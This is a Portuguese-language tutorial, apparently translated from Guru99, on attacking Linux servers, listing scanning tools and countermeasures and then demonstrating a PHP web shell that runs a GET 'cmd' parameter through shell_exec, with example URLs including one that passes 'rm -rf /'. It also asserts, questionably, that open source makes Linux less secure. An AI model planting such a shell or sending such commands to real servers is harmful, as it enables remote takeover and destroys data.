Hackeando o sistema operacional Linux: hackeando com Ubuntu (Tutorial de comandos)
Linux é o sistema operacional de servidor mais utilizado, especialmente para servidores web. É de código aberto; isso significa que qualquer pessoa pode ter acesso ao código-fonte. Isso o torna menos seguro em comparação com outros sistemas operacionais, pois os invasores podem estudar o código-fonte para encontrar vulnerabilidades.. Linux for Hackers trata de explorar essas vulnerabilidades para obter acesso não autorizado a um sistema.
Neste artigo, apresentaremos o que é o Linux, suas vulnerabilidades de segurança, hackear com Ubuntu e as contra-medidas que você pode implementar.
Nota rápida sobre Linux
Linux é um sistema operacional de código aberto. Existem muitas distribuições de sistemas operacionais baseados em Linux, como Redhat, Fedora e Ubuntu, etc. Ao contrário de outros sistemas operacionais, o Linux é menos seguro quando se trata de segurança. Isso ocorre porque o código-fonte está disponível gratuitamente, então é fácil estudá-lo em busca de vulnerabilidades e explorá-las em comparação a outros sistemas operacionais que não são de código aberto. O Linux pode ser usado como um sistema operacional de servidor, desktop, tablet ou dispositivo móvel.
Os programas Linux podem ser operados usando GUI ou comandos. Os comandos do Linux para Kali Linux hackear são mais eficazes e eficientes em comparação ao uso da GUI. Por esse motivo, é útil conhecer os comandos básicos do Linux para hackear.
Consulte estes tutoriais https://www.guru99.com/unix-linux-tutorial.html sobre como começar Kali Linux hacks.
Ferramentas de hackers para Linux
- Nessus– esta ferramenta pode ser usada para Ubuntu hackear, verificar configurações, patches e redes, etc., pode ser encontrado em https://www.tenable.com/products/nessus
- NMapa. Esta ferramenta pode ser usada para monitorar hosts em execução no servidor e os serviços que eles utilizam. Também pode ser usado para procurar portas. Ele pode ser encontrado em https://nmap.org/
- SARA – SARA é a sigla para Assistente de Pesquisa do Auditor de Segurança. Como o nome indica, esta ferramenta pode ser usada para auditar redes contra ameaças como Injeção de SQL, XSS etc. pode ser encontrado em http://www-arc.com/sara/sara.html
A lista acima não é exaustiva; dá uma ideia das ferramentas disponíveis para Ubuntu hackear e hackear sistemas Linux.
Como evitar hacks no Linux
Linux Hacking aproveita as vulnerabilidades do sistema operacional. Uma organização pode adotar a seguinte política para se proteger contra tais ataques.
- Gerenciamento de patches– patches corrigem bugs que os invasores exploram para comprometer um sistema. Uma boa política de gerenciamento de patches garantirá que você aplique constantemente patches relevantes ao seu sistema.
- Configuração adequada do sistema operacional– outras explorações aproveitam os pontos fracos na configuração do servidor. Nomes de usuários e daemons inativos devem ser desabilitados. As configurações padrão, como senhas comuns para aplicativos, nomes de usuário padrão e alguns números de porta, devem ser alteradas.
- Intrusion Detection System– tais ferramentas podem ser usadas para detectar acesso não autorizado ao sistema. Algumas ferramentas têm a capacidade de detectar e prevenir tais ataques.
Atividade de hacking: hackear um Ubuntu Sistema Linux usando PHP
Neste cenário prático, aprenderemos como hackear com Ubuntu e forneceremos informações básicas sobre como você pode usar PHP comprometer um Linux. Não vamos atingir nenhuma vítima. Se quiser experimentar, você pode instalar o LAMPP em sua máquina local.
PHP vem com duas funções que podem ser usadas para executar comandos de hacking do Linux. Possui funções exec() e shell_exec(). A função exec() retorna a última linha da saída do comando enquanto shell_exec() retorna todo o resultado do comando como uma string.
Para fins de demonstração, vamos supor que os gerentes do invasor carreguem o arquivo a seguir em um servidor web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
AQUI,
O script acima obtém o comando da variável GET chamada cmd. O comando é executado usando shell_exec() e os resultados retornados no navegador.
O código acima pode ser explorado usando o seguinte URL
http://localhost/cp/konsole.php?cmd=ls%20-l
AQUI,
- “…konsole.php?cmd=ls%20-l”atribui o valor ls –l à variável cmd.
O comando em Ubuntu para hackear o servidor será executado como
shell_exec('ls -l') ;
A execução do código acima em um servidor web fornece resultados semelhantes aos seguintes.
O comando acima simplesmente exibe os arquivos no diretório atual e as permissões
Suponhamos que o invasor passe o seguinte comando
rm -rf /
AQUI,
- “rm” remove os arquivos
- “rf” faz o comando rm ser executado em modo recursivo. Excluindo todas as pastas e arquivos
- “/” instrui o comando para começar a excluir arquivos do diretório raiz
O URL de ataque seria parecido com isto
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Resumo
- Linux é um sistema operacional popular para servidores, desktops, tablets e dispositivos móveis.
- Linux é de código aberto e o código-fonte pode ser obtido por qualquer pessoa. Isso torna mais fácil detectar as vulnerabilidades. É um dos melhores sistemas operacionais para hackers.
- Comandos básicos e de hacking de rede em Ubuntu são valiosos para hackers Linux.
- Vulnerabilidades são pontos fracos que podem ser explorados para comprometer um sistema.
- Uma boa segurança pode ajudar a proteger um sistema contra comprometimento de um invasor.